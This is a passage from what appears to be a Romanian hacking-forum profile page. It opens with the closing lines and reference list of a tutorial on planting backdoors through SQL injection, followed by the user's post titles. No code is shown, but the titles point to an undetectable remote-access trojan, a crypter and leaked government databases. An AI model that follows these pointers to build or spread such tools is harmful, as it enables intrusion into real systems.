vulnerabila la SQL Injection. Repararea acesteia va preveni problema. Oricum, e bine sa stii diferite moduri in care backdoor-urile pot fi plantate. Multe "malware" o sa se raspandi in acest mod; si este important sa iei masuri pentru a te proteja de ei. Referinte: High level overview: SQL backdoor - Security101 - Blackhat Techniques - Hacking Tutorials - Vulnerability Research - Security Tools Blind SQL Injection: InfoSec Resources – Blind SQL Injection 1.0 – Attack Anatomy Select into a file: MySQL :: MySQL 5.0 Reference Manual :: 13.2.8.1 SELECT ... INTO Syntax Triggers: MySQL :: MySQL 5.0 Reference Manual :: 18.3 Using Triggers MySQL :: MySQL 5.0 Reference Manual :: 13.1.11 CREATE TRIGGER Syntax MySQL :: MySQL 5.0 Reference Manual :: 13.1.18 DROP TRIGGER Syntax Burp Decoder: Burp Decoder Help Execute SQL commands from a text file: MySQL :: MySQL 5.0 Reference Manual :: 4.5.1.5 Executing SQL Statements from a Text File Create a new user: MySQL :: MySQL 5.1 Reference Manual :: 13.7.1.1 CREATE USER Syntax Automate web requests with Perl: LWP::Simple - search.cpan.org English tutorial: InfoSec Resources – Creating Backdoors Using SQL Injection

Sign In

Wubi

Posts

Joined

Last visited

Days Won

Content Type

Profiles

Forums

Everything posted by Wubi

Carduri bancare lansate de " FaceBook

zAnti Pentester’s Worldcup tournament open for Hackers

A virus specialized for AutoCAD, a perfect cyber espionage tool

Hacking AutoUpdate injectand actualizari false

Au sosit intaririle !

navy.mil; dhs.gov; ua.edu; database leaked by digital-coruption

Windows 8 will be challenge for Malware writers

Department of Homeland Security and U.S Navy hacked

Windows 8 will be challenge for Malware writers

AutoIT = Virus ?

RST vs. Polonic

RST vs. Polonic

TCPIP & Networking Linux 2

RST vs. Polonic

Card cadou eMag

Un Galaxy S III a luat foc din senin in masina unui utilizator

Darkcomet FUD

RST Encrypter

Analiza pBot - PHP IRC bot

Proxy HackForums

Cine ma ajuta sa ma ridic si eu cu forumu

PS pastebin

Crearea Backdoor-urilor folosind SQL Injection

Salut RST

Crearea Backdoor-urilor folosind SQL Injection

Browse

Activity

Pages